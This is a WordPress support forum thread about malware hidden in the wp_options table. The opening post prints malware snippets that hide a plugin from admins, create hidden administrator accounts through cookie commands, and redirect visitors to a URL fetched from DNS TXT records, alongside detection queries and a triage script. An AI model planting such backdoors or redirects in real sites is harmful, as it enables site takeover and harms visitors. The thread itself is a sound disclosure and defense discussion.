• Hey everyone,

    I’ve come across a new type of malware that has infected several of our WordPress installations, and what’s concerning is that none of the security scanners we used, including Wordfence, GOTMLS.NET, and about 12 others, were able to detect it. We tried all major tools, but none flagged this threat. It’s well hidden in the database, specifically in entries such as wpcode_snippets, siteurl, home, and redirection_options, and it uses advanced techniques to hide from both admins and security plugins.
    The site was compromised because it had a weak password, not due to any security vulnerabilities in plugins.

    Here are some of the scanners we used that failed to detect the malware:

    • Wordfence
    • GOTMLS.NET
    • Sucuri SiteCheck
    • MalCare
    • iThemes Security
    • All In One WP Security & Firewall
    • WPScan
    • Anti-Malware Security (by Eli/GOTMLS.NET)
    • SecuPress
    • Quttera Web Malware Scanner
    • Exploit Scanner
    • WPCore Scan
    • WP Cerber Security
    • ClamAV

    Despite using this wide range of scanners, none were able to identify the malicious code injected into the database. I’m sharing this here to alert the community and to see if anyone has encountered a similar issue or has insights on how to combat it.

    Admin Panel Hijacking:

    • The malware modifies the admin interface by hiding specific security-related plugins (like “Code Snippets”) and preventing the admin from reviewing compromised plugins and critical notifications.
    • Here’s a code snippet used to hide plugins:

    // Only active for administrators, and only when the request does not
    // carry ?show_all (the attacker's own way of seeing the real plugin list).
    if (current_user_can('administrator') && !array_key_exists('show_all', $_GET)) {
        // Inject CSS into wp-admin that hides the WPCode menu entry,
        // its admin-bar item and its review notice.
        add_action('admin_print_scripts', function () {
            echo '<style>';
            echo '#toplevel_page_wpcode { display: none; }';
            echo '#wp-admin-bar-wpcode-admin-bar-info { display: none; }';
            echo '#wpcode-notice-global-review_request { display: none; }';
            echo '</style>';
        });
        // Drop the WPCode (Insert Headers and Footers) plugin from the plugin
        // list, so it cannot be reviewed or deactivated from the UI.
        add_filter('all_plugins', function ($plugins) {
            unset($plugins['insert-headers-and-footers/ihaf.php']);
            return $plugins;
        });
    }

    Creation of Hidden Admin Users:

    • The malware reads cookie data to insert admin credentials into the database and creates hidden admin users, unknown to the actual site owner.
    • Here's an example of the code that creates hidden admin users:

    // $_pwsa (the attacker's shared secret) and _gcookie() (a cookie reader)
    // are defined elsewhere in the dropped script and are not shown here.
    if (!empty($_pwsa) && _gcookie('pw') === $_pwsa) {
        // The 'c' cookie selects a command; 'au' = add user.
        switch (_gcookie('c')) {
            case 'au':
                $u = _gcookie('u');   // username
                $p = _gcookie('p');   // password
                $e = _gcookie('e');   // e-mail address
                if ($u && $p && $e && !username_exists($u)) {
                    // Created through the normal WordPress API, then promoted
                    // to administrator; nothing in the UI shows this happened.
                    $user_id = wp_create_user($u, $p, $e);
                    $user = new WP_User($user_id);
                    $user->set_role('administrator');
                }
                break;
        }
    }

    Redirection of Non-Logged-In Users:

    • Non-logged-in users or visitors with certain IP addresses are redirected to malicious external URLs using DNS records.
    • Here’s the redirect code:

    function _red() {
        // Logged-in users (the site owner) never see the redirect.
        if (is_user_logged_in()) {
            return;
        }
        // _user_ip() is a helper from the same script, not shown here.
        $ip = _user_ip();
        if (!$ip) {
            return;
        }
        // The destination is not stored in the database: it is fetched at
        // request time as a base64-encoded DNS TXT record, so the code in
        // the DB never contains the final URL.
        $req = 'malicious-domain.com'; // Example of malicious domain being resolved
        $s = dns_get_record($req, DNS_TXT);
        if (is_array($s) && !empty($s)) {
            $redirect_url = base64_decode($s[0]['txt']);
            if (substr($redirect_url, 0, 4) === 'http') {
                wp_redirect($redirect_url);
                exit;
            }
        }
    }

    IP and Session Tracking:

    • The malware tracks IP addresses to avoid redirecting the same IP multiple times in a 24-hour period.

    How We Found It:

    The malware was hidden in the wp_options table, affecting entries like wpcode_snippets, siteurl, home, and redirection_options. It wasn’t detected by popular security plugins, including Wordfence.

    We ran the following SQL query across all installations to identify suspicious patterns:

    -- Adjust the wp_ prefix if the site uses a custom $table_prefix.
    SELECT option_name, option_value
    FROM wp_options
    WHERE option_name IN ('siteurl', 'home', 'wpcode_snippets', 'wpseo', 'redirection_options')
      AND (option_value LIKE '%<script%'
        OR option_value LIKE '%eval%'
        OR option_value LIKE '%base64_decode%'
        OR option_value LIKE '%document.write%');

    Observed Effects:

    • Non-logged-in users or visitors from unknown IPs are redirected to malicious sites.
    • Hidden admin users are created without the site owner’s knowledge.
    • Security plugins and important notifications are hidden from the admin panel.

    What You Should Know:

    • This malware injects itself into database options like wpcode_snippets and siteurl, making it hard to detect via traditional scans.
    • The existing WordPress security plugins (including Wordfence) did not detect this malware.

    What Can Be Done:

    If you manage WordPress sites, I highly recommend checking your wp_options table for any suspicious values using the SQL query above. If anyone from the WordPress security community or plugin developers has encountered similar issues, I would love to collaborate on identifying how this malware propagates and how we can stop it.

    Feel free to reach out if you need more details or want to review the code in depth. I’ve attached the full script of the malicious code I found injected as a value under wpcode_snippets in the wp_options table.

    Be aware: the code contained in the file below is malware. Please do not install or copy this code into your environment for any reason.

    https://file.io/RxJXp8clljh5

    Stay safe, and thanks for your attention!
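    An added triage script (not part of the original post, and not code from any plugin mentioned in this thread) that turns the checks above into something you can run offline against a database export. It widens the SQL query to the hooks the posted snippets actually call (all_plugins, dns_get_record, wp_create_user, set_role, wp_redirect), decodes base64 runs found in option values to see whether they hide a URL or PHP, and lists administrator accounts outside an allowlist, which covers the hidden-admin step above and the wp_update_* accounts mentioned later in the thread. It uses an in-memory SQLite copy of wp_options, wp_users and wp_usermeta instead of MySQL, and every row, domain and login in it is a constructed sample.

```python
"""Offline triage of a WordPress database export for the behaviours reported
in the thread: code-like content in wp_options rows (the report names
wpcode_snippets, siteurl, home and redirection_options), base64 blobs that
decode to a URL or PHP, and administrator accounts the owner did not create.

Added example, not code from the thread or from any plugin named in it.
An in-memory SQLite copy of three WordPress tables stands in for MySQL so it
runs without a live site; SAMPLE_OPTIONS / SAMPLE_USERS are constructed rows
that mimic the shapes described in the report and are not real data.
"""
import base64
import re
import sqlite3

# The thread's query looked for <script, eval, base64_decode and document.write.
# The posted snippets also rely on WordPress hooks and DNS, so those are added.
SUSPICIOUS_TOKENS = (
    "<script", "eval(", "base64_decode", "document.write",
    "dns_get_record", "wp_create_user", "set_role(", "wp_redirect(",
    "all_plugins", "display: none",
)

# Runs of the base64 alphabet long enough to carry a URL or a PHP stub.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_b64_indicators(value):
    """Return base64 runs inside `value` that decode to a URL or PHP code."""
    hits = []
    for run in B64_RUN.findall(value):
        try:
            text = base64.b64decode(run, validate=True).decode("utf-8", "ignore")
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        if text.startswith("http") or "<?php" in text:
            hits.append(text)
    return hits


def scan_options(conn):
    """Flag every wp_options row carrying a suspicious token or an encoded
    URL/PHP payload.  Unlike the thread's query this walks all rows, because
    the infection also landed in siteurl and home."""
    findings = []
    for name, value in conn.execute("SELECT option_name, option_value FROM wp_options"):
        tokens = [t for t in SUSPICIOUS_TOKENS if t in value]
        decoded = decode_b64_indicators(value)
        if tokens or decoded:
            findings.append({"option": name, "tokens": tokens, "decoded": decoded})
    return findings


def find_unexpected_admins(conn, known_admins):
    """List administrator accounts whose login is not in the owner's allowlist.
    WordPress keeps the role as a serialized array in wp_usermeta under
    wp_capabilities, so a LIKE on the serialized text is the portable check."""
    sql = (
        "SELECT u.ID, u.user_login, u.user_email, u.user_registered "
        "FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID "
        "WHERE m.meta_key = 'wp_capabilities' "
        "AND m.meta_value LIKE '%administrator%'"
    )
    params = tuple(known_admins)
    if params:
        sql += " AND u.user_login NOT IN (" + ",".join("?" for _ in params) + ")"
    sql += " ORDER BY u.ID"
    keys = ("id", "login", "email", "registered")
    return [dict(zip(keys, row)) for row in conn.execute(sql, params)]


# ---- constructed sample data (not from any real site) ----------------------
SAMPLE_OPTIONS = [
    ("siteurl", "https://example.org"),
    ("home", 'https://example.org<script src="https://cdn.invalid/x.js"></script>'),
    ("blogname", "Example site"),
    ("wpcode_snippets",
     "add_filter('all_plugins', function ($p) { unset($p['insert-headers-and-footers/ihaf.php']); return $p; });"
     " $s = dns_get_record('malicious-domain.invalid', DNS_TXT); wp_redirect(base64_decode($s[0]['txt']));"),
    ("redirection_options",
     "redirect_url=" + base64.b64encode(b"https://attacker.invalid/landing").decode()),
]
SAMPLE_USERS = [  # (ID, login, email, registered, serialized wp_capabilities)
    (1, "owner", "owner@example.org", "2020-01-01 00:00:00", 'a:1:{s:13:"administrator";b:1;}'),
    (2, "editor1", "ed@example.org", "2021-05-05 00:00:00", 'a:1:{s:6:"editor";b:1;}'),
    (7, "wp_update_43243", "x@mail.invalid", "2024-11-08 03:12:44", 'a:1:{s:13:"administrator";b:1;}'),
]


def build_sample_db():
    """Create the three tables the checks need and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE wp_options (option_name TEXT, option_value TEXT);"
        "CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_email TEXT, user_registered TEXT);"
        "CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);"
    )
    conn.executemany("INSERT INTO wp_options VALUES (?, ?)", SAMPLE_OPTIONS)
    for uid, login, email, registered, caps in SAMPLE_USERS:
        conn.execute("INSERT INTO wp_users VALUES (?, ?, ?, ?)", (uid, login, email, registered))
        conn.execute("INSERT INTO wp_usermeta VALUES (?, 'wp_capabilities', ?)", (uid, caps))
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    for f in scan_options(db):
        print("option %-22s tokens=%s decoded=%s" % (f["option"], f["tokens"], f["decoded"]))
    for a in find_unexpected_admins(db, known_admins=["owner"]):
        print("unexpected administrator:", a)
```

    Against a real site, restore a mysqldump into a scratch database (or swap sqlite3 for a MySQL client) and keep the table prefix in mind. An administrator that is not in your allowlist, or an option value that decodes to a URL, is worth treating as a finding even when every scanner in the list above reports the site clean.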

Viewing 6 replies - 1 through 6 (of 6 total)
  • Thread Starter nonsonokoreano

    (@nonsonokoreano)

    Plugin Author Eli

    (@scheeeli)

    Thanks for reporting this new threat. I have seen similar threats use this same technique of installing the WPCode Lite plugin and then creating code snippets in the DB to hide it from view in the wp-admin. In all the infections of this type that I have seen, the sites were compromised in different ways. Some were brute force while others were exploited using various un-patched plugin vulnerabilities.

    I would like to see the details of all the code you found but that link to the file you shared on file[.]io was already deleted. Can you please send me any files you have directly to my email?

    eli AT gotmls DOT net

    Plugin Author Eli

    (@scheeeli)

    My first reply was automatically held for moderation because I used the “V” word (you’ll see when a moderator has time to review it and allow it to be posted). Until then…

    I see that you have posted an update with a link to the infected content in your DB. I am familiar with that particular script and that variant has been in my definition updates since the 7th of last month, so I am not sure why it was not detected by my plugin on your site. Are you sure that specific code was in the DB of a site that you scanned with my Anti-Malware plugin, and you had the latest definition updates installed?

    Thread Starter nonsonokoreano

    (@nonsonokoreano)

    Yes, we definitely had the latest definition updates installed at 13:30 GMT on 09/11/2024 when we attempted to remove the malware, but unfortunately, nothing was detected, even with the most thorough and slow scan options enabled. The code I’ve shared is exactly what was found in the database, without any modifications.

    I’m not sure why it wasn’t picked up, but I wanted to bring it to your attention in case it helps improve future detection. Let me know if you need any more details or would like further logs from our side.

    Hello there, Julio here, SecuPress owner.

    We’re aware of this malware and finally found a way to really prevent user insertion, whether from wp_insert_user(), from a custom $wpdb query, or even pushed directly into the DB outside of a WordPress environment (yep, we did that!).

    We are also aware of plugins hiding themselves, or snippets hiding plugins, and finally found a way to always display every plugin on the plugins page.

    Then we finally added a more accurate MalwareDB Scanner to find that kind of code in the DB. And I’ll add one more thing for you to check: the CPT slug 'custom-css-js' can contain JS scripts that redirect, like the one you have shown.

    Those 3 features already exist in SecuPress, but in a less effective way; the next version (beta release this month!) can help you with those 3 points. I would be happy if you could test it first and give me some feedback. Contact me at “contact AT secupress.me”; the version is not ready yet, but will be soon, indeed.

    We are actually working on 2 features: one that prevents the full load of the website if a file is included when it should not be, and another for when an HTTP request parameter value is the same as a function name. Tricky because of false positives, but we’re trying; we really focus on WordPress malware and spend time on R&D to find the best ways to prevent a website from being hacked. (You read that first here ^^)

    Now, thank you very much for testing our plugins (not only mine, everyone here) and thank you for this report, it helps us and everyone mentioned to improve our products.

    See you soon

    This is exactly what’s happening with 14 of my WP-based websites for the last few months. I clean up the website with Wordfence and Anti-Malware, but within a week it comes back: a wp_update_43243 user (with some random numbers at the end) is created, along with 30 to 50 files with random names.

    It gets detected sometimes by Wordfence; sometimes I run a complete scan with Anti-Malware and it gets detected, but it comes back again.

    Here are a couple of files. This one is like the 30 to 50 files with random names: https://pastebin.com/3hqnr9Rq, and this 2nd one is usually only one master file per website, with a name something like .2345454.css in a deep folder: https://pastebin.com/y6YBqmBT

    It would be great if there’s a way to actually get rid of this malware completely.

    I have no nulled WP themes or plugins; most are free versions from WP.org, and a few themes were bought from ThemeForest and kept updated. All themes and plugins are always updated.
